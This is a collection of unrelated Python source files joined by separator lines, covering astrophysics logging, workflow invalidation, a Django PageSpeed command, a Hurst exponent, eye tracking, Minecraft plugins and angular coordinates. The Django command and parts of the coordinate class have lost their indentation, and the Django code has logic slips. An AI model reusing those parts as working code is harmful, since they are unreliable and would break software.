        Either a string from the list above, or an integer as specified
        in https://docs.python.org/2/library/logging.html#logging-levels
    print_version: bool
        If true, print version information
    """
    # A bare "-v" anywhere on the command line forces DEBUG output
    if "-v" in sys.argv:
        log_level = "DEBUG"
    # Accept either a level name ("info") or a numeric level (20)
    if type(log_level) is str:
        try:
            level = getattr(logging, log_level.upper())
        except AttributeError:
            raise ValueError("log_level {} not understood".format(log_level))
    else:
        level = int(log_level)
    logger = logging.getLogger("bilby_pipe")
    logger.propagate = False
    logger.setLevel(level)
    # One bool per existing handler: True if it is a plain StreamHandler
    streams = [type(h) == logging.StreamHandler for h in logger.handlers]
    # Attach a stream handler when there are no handlers yet, or when some
    # existing handler is not a StreamHandler.
    # NOTE(review): once a FileHandler is attached this condition becomes True
    # again and can add a second StreamHandler -- confirm this is intended.
    if len(streams) == 0 or not all(streams):
        stream_handler = logging.StreamHandler()
        stream_handler.setFormatter(
            logging.Formatter(
                "%(asctime)s %(name)s %(levelname)-8s: %(message)s", datefmt="%H:%M"
            )
        )
        stream_handler.setLevel(level)
        logger.addHandler(stream_handler)
    # Add at most one file handler, writing to outdir/label.log
    if any([type(h) == logging.FileHandler for h in logger.handlers]) is False:
        if label:
            if outdir:
                check_directory_exists_and_if_not_mkdir(outdir)
            else:
                outdir = "."
            log_file = "{}/{}.log".format(outdir, label)
            file_handler = logging.FileHandler(log_file)
            file_handler.setFormatter(
                logging.Formatter(
                    "%(asctime)s %(levelname)-8s: %(message)s", datefmt="%H:%M"
                )
            )
            file_handler.setLevel(level)
            logger.addHandler(file_handler)
    # Keep pre-existing handlers in sync with the requested level
    for handler in logger.handlers:
        handler.setLevel(level)
    if print_version:
        version = get_version_information()
        logger.info("Running bilby_pipe version: {}".format(version))
def get_version_information():
    """Return the version string stored in bilby_pipe/.version, or None (after
    printing a notice) when the file cannot be read."""
    base_dir = os.path.dirname(os.path.dirname(__file__))
    version_file = os.path.join(base_dir, "bilby_pipe/.version")
    try:
        with open(version_file, "r") as f:
            first_line = f.readline()
    except EnvironmentError:
        print("No version information file '.version' found")
    else:
        return first_line.rstrip()
def convert_string_to_dict(string, key):
    """ Convert a string repr of a string to a python dictionary

    Parameters
    ----------
    string: str
        The string to convert
    key: str
        A key, used for debugging

    Returns
    -------
    dict
        The parsed dictionary with values cast to int/float where possible

    Raises
    ------
    BilbyPipeError
        If the string cannot be evaluated as a dictionary
    """
    string = strip_quotes(string)
    # Convert equals to colons
    string = string.replace("=", ":")
    # Force double quotes around everything (raw string: no fragile escape
    # sequences, so the former "# noqa" is no longer needed)
    string = re.sub(r'(\w+)\s?:\s?("?[^,"}]+"?)', r'"\g<1>":"\g<2>"', string)
    # Evaluate as a dictionary of str: str
    try:
        dic = ast.literal_eval(string)
    except ValueError as e:
        # chain the original error so the root cause stays visible
        raise BilbyPipeError(
            "Error {}. Unable to parse {}: {}".format(e, key, string)
        ) from e
    # Convert values to floats/ints where possible; use a distinct loop
    # variable so the `key` argument is no longer shadowed
    for k in dic:
        dic[k] = string_to_int_float(dic[k])
    return dic
def strip_quotes(string):
    """Remove every single- and double-quote character from `string`.

    Inputs without string methods are returned unchanged.
    """
    try:
        return string.translate(str.maketrans("", "", "\"'"))
    except AttributeError:
        return string
def string_to_int_float(s):
    """Cast `s` to int if possible, else to float, else return it unchanged."""
    for caster in (int, float):
        try:
            return caster(s)
        except ValueError:
            continue
    return s
# Import-time side effect: configure the bilby_pipe logger (printing the
# version) and expose it for the helpers above.
setup_logger(print_version=True)
logger = logging.getLogger("bilby_pipe")
|
''' Logic on how information is invalidated in cascade. It is used by
validation-type nodes and patch requests '''
from cacahuate.errors import EndOfProcess
def get_ref_index(state, node, actor, ref, index):
    ''' Return the position of form `index` among the forms of `actor` on
    `node` that share the given `ref`, or None when it is not one of them. '''
    forms = state['state']['items'][node]['actors']['items'][actor]['forms']
    matching_positions = []
    for position, form in enumerate(forms):
        if form['ref'] == ref:
            matching_positions.append(position)
    target = int(index)
    if target in matching_positions:
        return matching_positions.index(target)
    return None
def cascade_invalidate(xml, state, invalidated, comment):
    ''' computes a set of fields to be marked as invalid given the
    original `invalidated` set of fields.

    Returns a flat dict of mongodb dotted update paths -> new values. '''
    # because this could cause a recursive import
    from cacahuate.node import make_node
    # find the first node that is invalid and select it
    # Replacement values supplied alongside the invalidation, keyed by ref
    set_values = {
        i['ref']: {
            'value': i['value'],
            'value_caption': i['value_caption'],
        }
        for i in invalidated
        if 'value' in i
    }
    invalid_refs = set(
        i['ref']
        for i in invalidated
    )
    # Walk every node in document order, letting each contribute the fields
    # that depend on the already-invalidated ones (transitive invalidation)
    xmliter = iter(xml)
    for element in xmliter:
        node = make_node(element, xmliter)
        more_fields = node.get_invalidated_fields(invalid_refs, state)
        invalid_refs.update(more_fields)
    # computes the keys and values to be used in a mongodb update to set the
    # fields as invalid
    updates = dict()
    for key in invalid_refs:
        # key format: "<node>.<actor>.<index>:<ref>.<input>"
        # NOTE: `input` shadows the builtin within this loop body only
        node, actor, form, input = key.split('.')
        index, ref = form.split(':')
        ref_index = get_ref_index(
            state=state,
            node=node,
            actor=actor,
            ref=ref,
            index=index,
        )
        # Dotted mongodb paths for every level touched by this field
        node_path = 'state.items.{node}'.format(node=node)
        comment_path = node_path + '.comment'
        node_state_path = node_path + '.state'
        actor_path = node_path + '.actors.items.{actor}'.format(actor=actor)
        actor_state_path = actor_path + '.state'
        form_path = actor_path + '.forms.{index}'.format(index=index)
        form_state_path = form_path + '.state'
        input_path = form_path + '.inputs.items.{input}'.format(input=input)
        input_state_path = input_path + '.state'
        input_value_path = input_path + '.value'
        input_caption_path = input_path + '.value_caption'
        values_input_path = 'values.{ref}.{ref_index}.{input}'.format(
            ref=ref,
            ref_index=ref_index,
            input=input,
        )
        # inputs: a field with a replacement value becomes valid again
        input_state = 'valid' if key in set_values else 'invalid'
        updates[input_state_path] = input_state
        if key in set_values:
            updates[input_value_path] = set_values[key]['value']
            updates[input_caption_path] = set_values[key]['value_caption']
            if ref_index is not None:
                updates[values_input_path] = set_values[key]['value']
        # forms: valid only while every one of its updated inputs is valid
        if input_state == 'valid' and (
                form_state_path not in updates or
                updates[form_state_path] == 'valid'):
            form_state = 'valid'
        else:
            form_state = 'invalid'
        updates[form_state_path] = form_state
        # actors: same aggregation, one level up
        if form_state == 'valid' and (
                actor_state_path not in updates or
                updates[actor_state_path] == 'valid'):
            actor_state = 'valid'
        else:
            actor_state = 'invalid'
        updates[actor_state_path] = actor_state
        # nodes: same aggregation at the top level; the comment is attached
        # to every touched node
        if actor_state == 'valid' and (
                node_state_path not in updates or
                updates[node_state_path] == 'valid'):
            node_state = 'valid'
        else:
            node_state = 'invalid'
        updates[node_state_path] = node_state
        updates[comment_path] = comment
    return updates
def track_next_node(xml, state, mongo, config):
    ''' given an xml and the current state, returns the first invalid or
    unfilled node following the xml's ruleset (conditionals)

    Raises EndOfProcess when every remaining node is already valid. '''
    from cacahuate.node import make_node
    xmliter = iter(xml)
    node = make_node(next(xmliter), xmliter)
    # The very first node wins immediately if it needs (re)filling
    if node.id in state['state']['items']:
        node_state = state['state']['items'][node.id]['state']
        if node_state in ('invalid', 'unfilled'):
            return node
    try:
        while True:
            node = node.next(
                xml,
                state,
                mongo,
                config,
                skip_reverse=True,
            )
            # Skip nodes whose recorded state is already valid; anything
            # unknown or not valid is the next node to execute
            if node.id in state['state']['items']:
                if state['state']['items'][node.id]['state'] == 'valid':
                    continue
            return node
    except StopIteration:
        # End of process
        raise EndOfProcess
|
__title__ = 'Website Colors'
|
from optparse import make_option
from django.core.management import BaseCommand, CommandError
from django.core.validators import URLValidator
from django.conf import settings
from django.utils.translation import ugettext as _
from apiclient.discovery import build
from apiclient.errors import HttpError
from psi.models import PageInsight, RuleResult, Screenshot
from django.core.exceptions import ValidationError
class Command(BaseCommand):
help = "Create PageSpeedInsights for a given URL."
option_list = BaseCommand.option_list + (
make_option("--url", "-u", action="store", dest="url",
help="The URL of the page for which the PageSpeed Insights API should generate results."),
make_option("--strategy", "-s", action="store", dest="strategy", default="desktop",
help="The strategy to use when analyzing the page. Valid values are desktop and mobile."),
make_option("--locale", "-l", action="store", dest="locale", default="en_US",
help="The locale that results should be generated in. See the list of supported locales. If the specified locale is not supported, the default locale is used."),
make_option("--rule", "-r", action="store", dest="rule",
help="The PageSpeed rules to run. Can be specified multiple times (for example, &rule=AvoidBadRequests&rule=MinifyJavaScript) to request multiple rules. If unspecified, all rules for the current strategy are used. Most users of the API should not need to specify this parameter."),
make_option("--key", "-k", action="store", dest="key",
help="The Google developer API key used when making the request. Unless Specified defaults to use the free tier on PageSpeed Insights. Good for getting a feel for how well this tool works for you."),
make_option("--console", "-c", action="store_true", default=False, dest="console",
help="Output the results to the console."),
make_option("--screenshot", "-i", action="store_true", default=False, dest="screenshot",
help="Indicates if binary data containing a screenshot should be included."),
)
def _processScreenshot(self, data, pageInsight):
screenshot = Screenshot()
screenshot.width = data.get('width', 0)
screenshot.height = data.get('height', 0)
screenshot.mime_type = data.get('mime_type', None)
screenshot.data = data.get('data', None)
screenshot.pageInsight = pageInsight
screenshot.save()
def _processRules(self, data, pageInsight):
for key in data:
ruleResult = RuleResult()
ruleResult.title = data[key]['localizedRuleName']
ruleResult.impact = data[key]['ruleImpact']
ruleResult.description = data[key]['urlBlocks'][0]['header']['format']
ruleResult.pageInsight = pageInsight
ruleResult.save()
def _processPageInsight(self, data):
pageInsight = PageInsight()
pageInsight.json = data
pageInsight.responseCode = data["responseCode"]
pageInsight.title = data["title"]
pageInsight.score = data["score"]
pageInsight.url = data['id']
pageInsight.numberResources = data['pageStats']["numberResources"]
pageInsight.numberHosts = data['pageStats']["numberHosts"]
pageInsight.totalRequestBytes = int(data['pageStats']["totalRequestBytes"])
pageInsight.numberStaticResources = data['pageStats']["numberStaticResources"]
pageInsight.htmlResponseBytes = int(data['pageStats']["htmlResponseBytes"])
pageInsight.cssResponseBytes = int(data['pageStats'].get("cssResponseBytes", 0))
pageInsight.imageResponseBytes = int(data['pageStats'].get("imageResponseBytes", 0))
pageInsight.javascriptResponseBytes = int(data['pageStats'].get("javascriptResponseBytes", 0))
pageInsight.otherResponseBytes = int(data['pageStats'].get("otherResponseBytes", 0))
pageInsight.numberJsResources = int(data['pageStats'].get("numberJsResources", 0))
pageInsight.numberCssResources = int(data['pageStats'].get("numberCssResources", 0))
pageInsight.screenshot = data.get('screenshot', None)
pageInsight.strategy = self.strategy
pageInsight.save()
return pageInsight
def _processPageStats(self, data, pageInsight):
pageStat = PageStats()
pageStat.numberResources = data["numberResources"]
pageStat.numberHosts = data["numberHosts"]
pageStat.totalRequestBytes = int(data["totalRequestBytes"])
pageStat.numberStaticResources = data["numberStaticResources"]
pageStat.htmlResponseBytes = int(data["htmlResponseBytes"])
pageStat.cssResponseBytes = int(data["cssResponseBytes"])
pageStat.imageResponseBytes = int(data["imageResponseBytes"])
pageStat.javascriptResponseBytes = int(data["javascriptResponseBytes"])
pageStat.otherResponseBytes = int(data["otherResponseBytes"])
pageStat.numberJsResources = int(data["numberJsResources"])
pageStat.numberCssResources = int(data["numberCssResources"])
pageStat.pageInsight = pageInsight
pageStat.save()
return pageStat
def _process_results(self, data):
pageInsight = self._processPageInsight(data)
self._processRules(data['formattedResults']['ruleResults'], pageInsight)
if self.screenshot:
self._processScreenshot(data['screenshot'], pageInsight)
if self.console:
self._console_report(pageInsight)
def _console_report(self, pageInsight):
print "\n" + _("PageSpeed Insights")
print "--------------------------------------------\n"
print "URL: \t\t\t%s" % pageInsight.url
print "Strategy: \t\t%s" % pageInsight.strategy
print "Score: \t\t\t%s\n" % pageInsight.score
print "--------------------------------------------"
for field in pageInsight._meta.get_all_field_names():
if field not in ('json', 'ruleresult', 'screenshot', 'score', 'url', 'strategy', 'id', 'title', 'created_date'):
print "%s\t\t\t%s" % (field, pageInsight._meta.get_field(field).value_from_object(pageInsight))
print "--------------------------------------------\n"
for result in pageInsight.ruleresult_set.all():
print "%s\t\t\t%s" % (result.title, result.impact)
print "\n"
def handle(self, *args, **options):
try:
urls = []
url = options.get('url')
if url:
urls.append(url)
else:
surls = getattr(settings, 'PSI_URLS', None)
if surls:
for url in surls:
urls.append(url)
else:
raise BaseException("No URLs provided. Please either pass a URL as an argument or define PSI_URLS in settings file.")
self.console = options.get('console')
self.screenshot = options.get('screenshot')
self.strategy = options.get('strategy')
locale = options.get('locale')
rule = options.get('rule')
key = options.get('key')
if options.get('key', False):
key = getattr(settings, 'GOOGLE_API_KEY', None)
service = build(serviceName='pagespeedonline', version='v1', developerKey=key)
for url in urls:
try:
URLValidator(url)
except ValidationError, e:
raise e
results = service.pagespeedapi().runpagespeed(url=url, strategy=self.strategy, locale=locale, rule=rule, screenshot=self.screenshot).execute()
self._process_results(results)
except HttpError, e:
raise e
except Exception, e:
raise CommandError(e.message)
|
import pandas as pd
import numpy as np
import random
## Hurst
def hurst_series(x, N):
    """Rolling Hurst exponent over a sliding window of length N.

    Parameters
    ----------
    x : pd.Series
        Input series.
    N : int
        Window length.

    Returns
    -------
    pd.Series
        Aligned with ``x.index``; the first N-1 entries are NaN. If
        ``len(x) < N`` the whole series is NaN.
    """
    def _hurst(series):
        """Estimate the Hurst exponent of one window via the aggregated-
        variance method (slope of the log-log variance plot)."""
        segs = 4.00  # 5.0
        n_obs = len(series)
        mlarge = np.floor(n_obs / segs)
        # Candidate aggregation block sizes, log-spaced and deduplicated
        M = np.array([np.floor(np.logspace(0, np.log10(mlarge), 50))])
        M = np.unique(M[M > 1])
        n = len(M)
        # Fit only the middle portion of the log-log curve
        cut_min = int(np.ceil(n / 10.0))
        cut_max = int(np.floor(6.0 * n / 10.0))
        V = np.zeros(n)
        for i in range(n):
            m = int(M[i])
            k = int(np.floor(n_obs / m))
            matrix_sequence = np.array(series[:m * k]).reshape((k, m))
            V[i] = np.var(np.sum(matrix_sequence, 1) / float(m))
        logm = np.log10(M)
        logv = np.log10(V)
        X = logm[cut_min:cut_max]
        Y = logv[cut_min:cut_max]
        p1 = np.polyfit(X, Y, 1)
        Yfit = np.polyval(p1, X)
        beta = -(Yfit[-1] - Yfit[0]) / (X[-1] - X[0])
        H = 1.0 - beta / 2.0
        return H
    if len(x) < N:
        # np.nan instead of the np.NaN alias, which was removed in NumPy 2.0
        return (pd.Series(index=x.index, data=np.nan))
    v = np.zeros(len(x) - N + 1)
    for i in range(len(x) - N + 1):
        v[i] = _hurst(x[i:i + N])
    return pd.Series(index=x.index, data=np.append((N - 1) * [np.nan], v))
|
# The sender's email (must be a Gmail account):
from_email = '' # e.g. 'example@gmail.com'
from_email_password = '' # the password of the sender account
# The receiver's email:
to_email = '' # e.g. 'example@example.com'
|
#!/usr/bin/env python
"""Video eye tracking
Usage:
vid_track <vid.mov> <behave.csv> [--box <x,y,w,h>] [--dur <len_secs>] [--start <start_secs>] [--method <method>] [--fps <fps>]
vid_track methods
vid_track (-h | --help)
vid_track --version
Options:
--box POS initial pos of box containing pupil. csv like x,y,w,h. no spaces. [default: 64,46,70,79]
--dur SECS Only run for SECS of the video [default: 9e9]
--method METH Eye tracking method [default: kcf]
--start SECS time to start [default: 0]
--fps FPS frames per second [default: 60]
-h --help Show this screen.
--version Show version.
Example:
./cli.py input/run1.mov input/10997_20180818_mri_1_view.csv --start 6 --dur 6
"""
from docopt import docopt
from tracker import auto_tracker
from extraction import extraction
if __name__ == '__main__':
    args = docopt(__doc__, version='VidTrack 0.1')
    # print(args); exit()
    # Initial pupil bounding box: "x,y,w,h" -> tuple of ints
    init_box = tuple(int(part) for part in args['--box'].split(','))
    print(init_box)
    fps = int(args['--fps'])
    start_frame = int(args['--start']) * fps
    # --dur defaults to "9e9" (scientific notation), which int() rejects;
    # parse via float first, then truncate
    max_frames = int(float(args['--dur'])) * fps + start_frame
    tracker_name = args["--method"]
    track = auto_tracker(args['<vid.mov>'], init_box,
                         write_img=False,
                         tracker_name=tracker_name, max_frames=max_frames,
                         start_frame=start_frame)
    track.set_events(args['<behave.csv>'])
    track.run_tracker()
    track.annotated_plt()
|
import zipfile
from os import listdir
from os.path import isfile, join
import yaml
import asyncio
from flask import current_app
from .util import Loggers
async def get_plugins():
    """Scan the configured Minecraft plugin folder for jar files.

    Returns a sorted list of (plugin_name, plugin_version, jar_file) tuples,
    read from each jar's plugin.yml. Unreadable jars are logged and skipped.
    """
    plugins = []
    plugin_path = current_app.config['MINECRAFT_PLUGIN_FOLDER']
    plugin_files = [f for f in listdir(
        plugin_path) if isfile(join(plugin_path, f))]
    for jar_file in plugin_files:
        try:
            # Context managers close the jar and the member stream even on
            # errors; the original leaked both file handles.
            with zipfile.ZipFile(join(plugin_path, jar_file), 'r') as jar:
                if 'plugin.yml' in jar.namelist():
                    with jar.open('plugin.yml', 'r') as plugin_file:
                        plugin_yaml = yaml.load(plugin_file, Loader=yaml.FullLoader)
                    plugin_name = plugin_yaml['name']
                    plugin_version = plugin_yaml['version']
                    plugins.append((plugin_name, plugin_version, jar_file))
        except Exception as e:
            Loggers.Error.error("Error in:" + jar_file)
            Loggers.Error.error(e)
    plugins.sort()
    return plugins
|
#Copyright 2008 Erik Tollerud
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
This module contains classes representing coordinates in spatial, celestial, and
terrestrial coordinate systems, as well as implementations of transformations
between many of the coordinate systems. There are also utility functions for
ease-of-use of some of these classes.
The coordinate system framework is designed to allow users to add their own
coordinate systems easily, if desired, and implement transformations between
theirs and the builtin coordinate systems. This is implemented through the
transformation registry static methods of the :class:`CoordinateSystem` class
(e.g. :meth:`CoordinateSystem.registerTransform`).
Examples
^^^^^^^^
A common task might be to convert coordinates from one standard coordinate
system to another. The coords module makes this simple::
>>> from astropysics.coords import ICRSCoordinates,GalacticCoordinates
>>> gcoords = ICRSCoordinates('2h34m12.32s',12.3).convert(GalacticCoordinates)
>>> print gcoords
GalacticCoordinates: l=158.558650,b=-43.350066
>>> print '%.3f'%gcoords.l.degrees
158.559
>>> print '%.3f'%gcoords.l.radians
2.767
>>> print gcoords.b.getDmsStr(canonical=True)
-43:21:00.24
Note the initial input composed of an hours,minutes,seconds string input for the
RA, and a float for the dec -- :class:`EquatorialCoordinate` objects contain a
powerful parsing system that accepts most standard astronomical representations.
The resulting :class:`GalacticCoordinates` object's coordinates can then be
accessed in any of the various ways supported by the :class:`AngularCoordinate`
object.
.. warning::
    Errors are not currently propagated in all coordinate transforms - this
    will be corrected eventually, but for now you should check to make sure
    errors propagate for any coordinate transform you want to perform.
{transformdiagram}
Classes and Inheritance Structure
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
.. inheritance-diagram:: astropysics.coords.coordsys
:parts: 1
Module API
^^^^^^^^^^
"""
#TODO: implement polar motion lookup techniques
from __future__ import division,with_statement
from ..constants import pi
from ..utils import add_docs
import numpy as np
# Convenience constants: full circle and quarter circle, in radians.
_twopi = 2*pi
_pio2 = pi/2
try:
    #requires Python 2.6
    from abc import ABCMeta
    from abc import abstractmethod
    from abc import abstractproperty
    from collections import Sequence,MutableSequence
except ImportError: #support for earlier versions
    # Graceful degradation: stub out the ABC machinery so the module still
    # imports on pre-2.6 interpreters (abstract checks simply disappear).
    # NOTE(review): on Python >= 3.10 these collections imports also fail
    # (moved to collections.abc), so this fallback path is taken there too.
    abstractmethod = lambda x:x
    abstractproperty = property
    ABCMeta = type
    class MutableSequence(object):
        __slots__=('__weakref__',) #support for weakrefs as necessary
    class Sequence(object):
        __slots__=('__weakref__',) #support for weakrefs as necessary
class AngularCoordinate(object):
"""
A class representing an angular value.
Arithmetic operators can be applied to the coordinate, and will be applied
directly to the numerical value in radians. For + and -, two angular
coordinates may be used, although for -, an AngularSeparation object will
be returned.
"""
import re as _re
__slots__=('_decval','_range')
    #this disturbingly complex RE matches anything that looks like a standard sexagesimal or similar string
__acregex = _re.compile(r'(?:([+-])?(\d+(?:[.]\d*)?)(hours|h|degrees|d|radians|rads|rad|r| |:(?=\d+:\d+[.]?\d*$)))?(?:(\d+(?:[.]\d*)?)(m|\'|[:]| ))?(?:(\d+(?:[.]\d*)?)(s|"|$))?$')
#and this one matches all things that look like raw numbers
__decregex = _re.compile(r'[+-]?\d+([.]\d*)?$')
    def __init__(self,inpt=None,sghms=None,range=None,radians=False):
        """
        The input parser is very adaptable, and can be in any of the following
        forms for `inpt`:

        * A float value
            if `radians` is True, this will be interpreted as decimal radians,
            otherwise, it is in degrees.
        * An :class:`AngularCoordinate` object
            A copy of the input object will be created.
        * None
            The default of 0 will be used.
        * A 3-tuple
            If `sghms` is True, the tuple will be interpreted as
            (hours,min,sec), otherwise, (degrees,min,sec).
        * A string of the form ##.##
            If `radians` is True, this will be cast to a float and used as
            decimal radians, otherwise, it is in degrees.
        * A string of the form ##.##d or ##.##degrees
            The numerical part will be cast to a float and used as degrees.
        * A string of the form ##.##h or ##.##hours
            The numerical part will be cast to a float and used as hours.
        * A string of the form ##.##radians,##.##rads, or ##.##r
            The numerical part will be cast to a float and used as radians.
        * A string of the form (+/-)##h##m##.##s
            The numerical parts will be treated as hours,minutes, and seconds.
        * A string of the form (+/-)##d##m##.##s or (+/-)##d##'##.##"
            The numerical parts will be treated as degrees,minutes, and seconds.
        * A string of the form (+/-)##:##:##.## or (+/-)## ## ##.##
            Sexagesimal form. If `sghms` is None the presence of a + or - sign
            indicates that it should be interpreted as degrees, minutes, and
            seconds. If the sign is absent, the numerical portions will be
            treated as hours,min,sec. Otherwise, if `sghms` evaluates to True,
            the numerical parts will be treated as hours,minutes, and seconds,
            and if `sghms` evaluates to False, degrees,minutes, and seconds.

        :param inpt: The coordinate value -- valid forms are described above.
        :param sghms:
            If True, ambiguous sexagesimal inputs should be hours, minutes, and
            seconds instead of degrees,arcmin, and arcsec
        :type sghms: boolean
        :param range:
            Sets the valid range of coordinates.  Either a
            2-sequence (lowerdegrees,upperdegrees) or None (for no limit)
        :param radians:
            If True, ambiguous inputs are treated as radians rather than
            degrees.
        :type radians: boolean

        **Examples**

        >>> from math import pi
        >>> ac = AngularCoordinate(2.5)
        >>> print ac
        +2d30'00.00"
        >>> print AngularCoordinate(ac)
        +2d30'00.00"
        >>> print AngularCoordinate(pi,radians=True)
        +180d00'00.00"
        >>> print AngularCoordinate('1.1')
        +1d6'00.00"
        >>> print AngularCoordinate('1.1',radians=True)
        +63d1'31.29"
        >>> print AngularCoordinate('12d25m12.5s')
        +12d25'12.50"
        >>> print AngularCoordinate('3:30:30',sghms=True)
        +52d37'30.00"
        >>> print AngularCoordinate('3:30:30',sghms=False)
        +3d30'30.00"
        >>> print AngularCoordinate('-3:30:30',sghms=None)
        -3d30'30.00"
        >>> print AngularCoordinate('+3:30:30',sghms=None)
        +3d30'30.00"
        >>> print AngularCoordinate('3:30:30',sghms=None)
        +52d37'30.00"
        """
        from operator import isSequenceType
        self._range = None

        if isinstance(inpt,AngularCoordinate):
            # copy constructor: take value and range directly
            self._decval = inpt._decval
            self._range = inpt._range
            return
        elif inpt is None:
            self._decval = 0
        elif isinstance(inpt,basestring):
            sinpt = inpt.strip()
            # first try a plain number: degrees (or radians if radians=True)
            decm = self.__decregex.match(sinpt)
            if decm:
                if radians:
                    self.radians = float(decm.group(0))
                else:
                    self.degrees = float(decm.group(0))
            else:
                # otherwise try the full sexagesimal/unit-suffixed grammar
                acm = self.__acregex.match(sinpt)
                if acm:
                    sgn,dec1,mark1,dec2,mark2,dec3,mark3 = acm.group(1,2,3,4,5,6,7)
                    val = (0 if dec1 is None else float(dec1)) + \
                          (0 if dec2 is None else float(dec2)/60) + \
                          (0 if dec3 is None else float(dec3)/3600)
                    if sgn == '-':
                        val *= -1
                    if mark1 == ':' or mark1 == ' ':
                        # ambiguous sexagesimal: sign and sghms decide the unit
                        if sghms is None:
                            if sgn is None:
                                self.hours = val
                            else: #'+' or '-'
                                self.degrees = val
                        elif sghms:
                            self.hours = val
                        else:
                            self.degrees = val
                    elif mark1 == 'hours' or mark1 == 'h':
                        self.hours = val
                    elif mark1 == 'degrees' or mark1 == 'd':
                        self.degrees = val
                    elif mark1 == 'radians' or mark1 == 'rad' or mark1 == 'rads' or mark1=='r':
                        self.radians = val
                    else:
                        try:
                            if radians:
                                self.radians = float(val)
                            else:
                                self.degrees = float(val)
                        except ValueError:
                            raise ValueError('invalid string input for AngularCoordinate')
                else:
                    raise ValueError('Invalid string input for AngularCoordinate: '+inpt)
        elif isSequenceType(inpt) and len(inpt)==3:
            # 3-sequence: (h,m,s) or (d,m,s) depending on sghms
            if sghms:
                self.hrsminsec = inpt
            else:
                self.degminsec = inpt
        elif radians:
            self._decval = float(inpt)
        else:
            from math import radians
            self._decval = radians(inpt)

        self.range = range
    def _setDegminsec(self,dms):
        """Set from a (degrees, minutes, seconds) 3-sequence; the sign of the
        degrees entry sets the sign of the whole angle."""
        if not hasattr(dms, '__iter__') or len(dms)!=3:
            raise ValueError('Must set degminsec as a length-3 iterator')
        self.degrees = abs(dms[0])+abs(dms[1])/60.+abs(dms[2])/3600.
        # NOTE(review): a negative-zero degrees entry (e.g. (-0, 30, 0))
        # cannot be detected here, so such inputs come out positive.
        if dms[0]<0:
            self._decval*=-1
    def _getDegminsec(self):
        """Return the angle as a (degrees, minutes, seconds) tuple; only the
        degrees entry carries the sign."""
        fulldeg = abs(self.degrees)
        deg = int(fulldeg)
        fracpart = fulldeg-deg
        # NOTE: `min` shadows the builtin inside this method only
        min = int(fracpart*60.)
        sec = fracpart*3600.-min*60.
        return -deg if self.degrees < 0 else deg,min,sec
    degminsec = property(_getDegminsec,_setDegminsec,doc="""
    The value of this :class:`AngularCoordinate` as an (degrees,minutes,seconds)
    tuple, with degrees and minutes as integers and seconds as a float.
    """)
    dms = degminsec
    def _setHrsminsec(self,dms):
        """Set from an (hours, minutes, seconds) 3-sequence (1 hour = 15 deg)."""
        if not hasattr(dms, '__iter__') or len(dms)!=3:
            raise ValueError('Must set hrsminsec as a length-3 iterator')
        self.degrees = 15*(dms[0]+dms[1]/60.+dms[2]/3600.)
    def _getHrsminsec(self):
        """Return the angle as an (hours, minutes, seconds) tuple."""
        factorized = self.degrees/15.
        hrs = int(factorized)
        mspart = factorized - hrs
        # NOTE: `min` shadows the builtin inside this method only
        min = int(mspart*60.)
        sec = mspart*3600.-min*60.
        return hrs,min,sec
    hrsminsec = property(_getHrsminsec,_setHrsminsec,doc="""
    The value of this :class:`AngularCoordinate` as an (hours,minutes,seconds)
    tuple, with hours and minutes as integers and seconds as a float.
    """)
    hms = hrsminsec
def _setDecdeg(self,deg):
rads = deg*pi/180.
if self.range is not None:
rads = self._checkRange(rads)
self._decval = rads
def _getDecdeg(self):
return self._decval*180/pi
degrees = property(_getDecdeg,_setDecdeg,doc="""
The value of this :class:`AngularCoordinate` in decimal degrees.
""")
d = degrees
def _setRad(self,rads):
if self.range is not None:
rads = self._checkRange(rads)
self._decval = rads
def _getRad(self):
return self._decval
radians = property(_getRad,_setRad,doc="""
The value of this :class:`AngularCoordinate` in decimal radians.
""")
r = radians
def _setDechr(self,hr):
rads = hr*pi/12
if self.range is not None:
rads = self._checkRange(rads)
self._decval = rads
def _getDechr(self):
return self._decval*12/pi
hours = property(_getDechr,_setDechr,doc="""
The value of this :class:`AngularCoordinate` in decimal hours.
""")
h = hours
    def _checkRange(self,rads):
        """
        Checks if the input value is in range - returns the new value, or raises
        a :exc:`ValueError`.

        :param rads: the candidate angle in radians
        :returns: the (possibly coerced) angle in radians
        :raises ValueError: if the range has no cycle and `rads` is outside it
        """
        if self._range is not None:
            low,up,cycle = self._range
            if cycle is None:
                #no cycle: the value must already lie within [low, up]
                if low <= rads <= up:
                    return rads
                else:
                    raise ValueError('Attempted to set angular coordinate outside range')
            else:
                if cycle > 0:
                    #this means use "triangle wave" pattern with the given quarter-period
                    from math import sin,asin
                    offset = low/(low-up)-0.5
                    return (up-low)*(asin(sin(pi*(2*rads/cycle+offset)))/pi+0.5)+low
                else:
                    #cycle <= 0: simple modular wrap into [low, up)
                    return (rads-low)%(up-low)+low
        else:
            #no range set - accept any value unchanged
            return rads
    def _setRange(self,newrng):
        """
        Setter for the :attr:`range` property. Accepts None, a 2-sequence, or a
        3-sequence in degrees, normalizes it to an internal radian 3-tuple, and
        re-checks the current value against the new range. On failure the old
        range is restored.
        """
        #remember the previous range so a failed set can be rolled back
        oldrange = self._range
        try:
            if newrng is None:
                self._range = None
            else:
                from math import radians
                newrng = tuple(newrng)
                if len(newrng) == 2:
                    #2-sequence: a full 360-degree span defaults to wrap (cycle=0),
                    #anything else defaults to strict bounds (cycle=None)
                    if newrng[1]-newrng[0] == 360:
                        newrng = (newrng[0],newrng[1],0)
                    else:
                        newrng = (newrng[0],newrng[1],None)
                elif len(newrng)==3:
                    pass
                else:
                    raise TypeError('range is not a 2 or 3-sequence')
                if newrng[0] > newrng[1]:
                    raise ValueError('lower edge of range is not <= upper')
                #convert the degree inputs to radians for internal storage
                newrng = ( radians(newrng[0]),radians(newrng[1]), \
                           None if newrng[2] is None else radians(newrng[2]) )
            self._range = newrng
            #coerce/validate the current value against the new range
            self._decval = self._checkRange(self._decval)
        except ValueError,e:
            #roll back, then distinguish a bad range from an out-of-range value
            self._range = oldrange
            if e.args[0] == 'lower edge of range is not <= upper':
                raise e
            else:
                raise ValueError('Attempted to set range when value is out of range')
    def _getRange(self):
        """Getter for :attr:`range` - returns the range converted to degrees."""
        if self._range is None:
            return None
        else:
